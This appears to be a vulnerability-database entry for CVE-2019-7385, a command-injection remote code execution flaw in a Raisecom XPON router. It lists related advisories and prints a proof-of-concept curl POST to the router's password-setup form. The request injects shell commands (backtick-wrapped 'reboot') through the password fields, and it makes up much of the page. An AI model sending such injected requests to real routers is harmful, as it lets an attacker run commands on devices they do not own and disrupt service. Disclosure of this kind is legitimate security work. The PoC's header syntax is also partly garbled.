Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution

🗓️ 04 Mar 2019 00:00:00Reported by JameelNabboType

Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution vulnerability on MacOS

Reporter	Title	Published	Views	Family All 13
0day.today	Raisecom Technology GPON-ONU HT803G-07 Command Injection (2)	13 Feb 201900:00	–	zdt
0day.today	Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution Exploit	4 Mar 201900:00	–	zdt
Circl	CVE-2019-7385	13 Feb 201914:45	–	circl
CNVD	Raisecom Technology GPON-ONU HT803G-07 Command Injection Vulnerability (CNVD-2019-05548)	27 Feb 201900:00	–	cnvd
CVE	CVE-2019-7385	17 Mar 201919:13	–	cve
Cvelist	CVE-2019-7385	17 Mar 201919:13	–	cvelist
EUVD	EUVD-2019-16927	7 Oct 202500:30	–	euvd
exploitpack	Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution	4 Mar 201900:00	–	exploitpack
NVD	CVE-2019-7385	21 Mar 201916:01	–	nvd
Packet Storm	Raisecom Technology GPON-ONU HT803G-07 Command Injection	13 Feb 201900:00	–	packetstorm

# Exploit Title: Remote code execution in Raisecom xpon
# Date: 03/03/2019
# Exploit Author: JameelNabbo
# Website: Ordina.nl
# Vendor Homepage: https://www.raisecom.com
# Software Link: https://www.raisecom.com/products/xpon
# Version: ISCOMHT803G-U_2.0.0_140521_R4.1.47.002
# Tested on: MacOSX
# CVE-2019-7385

POC:
curl -i -s -k -X 'POST' \
-H 'Origin: http://127.0.0.1&apos; -H -H 'Content-Type:
application/x-www-form-urlencoded' -H 'User-Agent: Chrome/7.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/65.0.3325.181 Safari/537.36' -H 'Referer: http://192.168.1.1/password.asp&apos; \
--data-binary
$'userMode=0&oldpass=netstat&newpass=`reboot`&confpass=`reboot`&submit-url=%2Fpassword.asp&save=Apply+Changes&csrf_token=current_cCSRF_ToKEN'
\
'http://192.168.1.1/boaform/formPasswordSetup&apos;

04 Mar 2019 00:00Current

7.7High risk

Vulners AI Score7.7

CVSS 27.2

CVSS 3.17.8

EPSS0.0475